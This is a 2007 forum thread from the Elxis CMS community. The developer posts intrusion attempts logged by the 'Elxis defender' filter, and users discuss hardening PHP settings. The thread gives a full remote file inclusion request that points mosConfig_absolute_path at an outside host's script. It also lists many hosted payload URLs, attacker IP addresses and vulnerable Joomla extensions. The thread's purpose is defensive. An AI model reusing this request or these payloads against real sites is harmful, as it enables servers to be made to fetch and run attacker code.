Detected by Elxis defender exploits

[datahell]

I saw a dangerous request today at elxis.org logs and I need to tell everyone again the importance of having register globals to off and some php functions disabled.

The request (written in 3 lines):

/index.php?topic=996.0//index.php?
_REQUEST=&_REQUEST%5boption%5d=com_login&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=http://bsnet.web.id/safe.txt?

Exploit: http://bsnet.web.id/safe.txt

Functions used:
disk_free_space, shell_exec, exec, system, passthru, popen, getcwd

[c8620p]

Ok but if we set this option to OFF some of the components may stop working.
Should we be always afraid of something or in new version (2008) something will be more safe?

[datahell]

ALL Elxis standard and Elxis compatible components work perfect with register_globals off. Elxis does not need register_globals to be on. In installation we say that very clear. Elxis 2006.x and 2008.x are safe enough but security is not only a matter of the CMS. It is also a matter of the CMS enviroment. Generally Elxis is very secure.

Elxis 2008.x has some more security enhanchements:

1. Option to hide the administration login page!
2. Elxis defender became more effective.
3. Option to log the login attemps to the administration area (successfull or not).
4. The whole frontend became more "solid" giving less privelledges to users.
5. You can control access settings for any part of the administration area.

[Ivan Trebješanin]

Should we be always afraid ...

YES! It is wise to be cautious all the time, as you can never know what comes next in someone else's mind. And no CMS can be 100% safe, if you leave your dirs or files on 777, or your server is misconfigured, in example. Elxis is the best CMS there ever was regarding security, but hey, there are a lot of pranksters out there, and some of them are smart. 

[datahell]

Unfortunately there is no 100% secure application. Elxis is strong enough but we can not guarantee absolute security. Even elxis.org can theoretically be hacked. For the ones that you may not know it, joomla.org was hacked a month ago. As far as I know it was hacked due a third party component. Elxis core is very secure as we continuously work on it, update and make fixes where needed it. The most security problems are usually from third party applications and insecure site environment. So, please take a look at these, we take care of Elxis.

[c8620p]

Sorry for the earlier post but I think that I saw somewhere in an installation of a component (for Elxis) that RegisterGlobals MUST be set to ON. Meaby I'm wrong. In the meantime thank you for your answer.

[datahell]

A new exploit/attack detected by Elxis Defender.

ATTACKER IP ADDRESS: 81.215.251.202
Country: Turkey (Izmir)
Exploit: http://animaliitaliani.com/x.dat?list=1&cmd=id (hosted in Italy)
Also here: http://georgiaeliteallstars.com/tool20.dat?list=1&cmd=id (hosted in USA)
DATE: 03-10-2007 01:56:57

Notice: New Elxis Defender sends you also the requested URI (if you have enabled e-mail notifications).

[datahell]

New exploit detected by Elxis defender

ATTACKER IP ADDRESS: 85.25.30.127
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Germany
EXPLOIT: http://pastebin.ca/raw/725499? (hosted in Canada)
DATE: 04-10-2007 22:08:01

Notice: If you wish to have now the new version of Elxis Defender (available in Elxis 2008.x) send me a PM to send you the new version.

I will ONLY accept requests from:
- Elxis Team members
- Elxis community members
- People having support contracts with GO UP Inc
- GO UP Inc's affiliates and partners.

[datahell]

ATTACKER IP ADDRESS: 217.65.240.14
Country: Ukraine (LVIVSKA OBLAST)
Exploit: http://usuarios.arnet.com.ar/larry123/safe.txt? (hosted in Argentina)
DATE: 05-10-2007 07:22:09

[datahell]

ATTACKER IP ADDRESS: 207.150.191.62
Country: United States (California, Dixon)
Exploit: http://www.brandy-rose.com/members/id.txt?  (hosted in USA)
DATE: 05-10-2007 18:11:05

[datahell]

ATTACKER IP ADDRESS: 209.59.205.211
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mmsblog (joomla)
COUNTRY: United States (Washington, Bellevue)
EXPLOIT: http://www.kadastra.com/de/ec.txt? (hosted in Bulgaria)
DATE: 05-10-2007 21:19:15

[datahell]

ATTACKER IP ADDRESS: 74.86.55.194
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_serverstat (joomla)
COUNTRY: USA (Illinois, Chicago)
EXPLOIT: http://www.brandy-rose.com/members/id.txt? (hosted in USA)
DATE: 05-10-2007 22:04:48

[datahell]

ATTACKER IP ADDRESS: 67.18.228.34
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mtree
COUNTRY: USA (Texas, Dallas)
EXPLOIT: http://tric.or.id/id.txt? (hosted in Indonesia)
DATE: 06-10-2007 02:10:04



ATTACKER IP ADDRESS: 81.214.175.110
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Turkey (Izmir)
EXPLOIT: http://animaliitaliani.com/x.dat?list=1&cmd=id (hosted in Italy)
DATE: 06-10-2007 07:22:54

[datahell]

From the kind of attacks Elxis defender blocks daily we see software that is possibly vunerable.

So, here are 3 joomla extensions with security problems:
module astatspro_show_2
bot multithumb
component ricettario (vunerable in backend too! )

We also have many attacks on component mtree and specially on the savant files (there is an elxis version available)

Having register_globals off, allow_url_fopen off or set mosConfig as a filter at Elxis defender (version 2008) makes these attacks useless.

New exploits:
http://futurehousingsystems.com/images/control.txt
http://www.dunakom.hu/userimages/id.txt
http://www.cityvoice.biz/shop/pub/_vti/safe.txt
http://www.canalhip-hop.kit.net/id.txt
ftp://132.203.200.248 ( /nod32/new )

[nikos65]

Continuous attacks at  www[dot]hotel-astoria[dot]gr today

#     IP     Date     Filters
1    66.135.32.79   [GEO 1]   [GEO 2]    Sunday, 21 October 2007 07:38:18    mosConfig_
2    216.22.3.3   [GEO 1]   [GEO 2]    Sunday, 21 October 2007 07:42:04    mosConfig_
3    211.202.2.55   [GEO 1]   [GEO 2]    Sunday, 21 October 2007 08:08:58    mosConfig_

Two from usa and one from korea .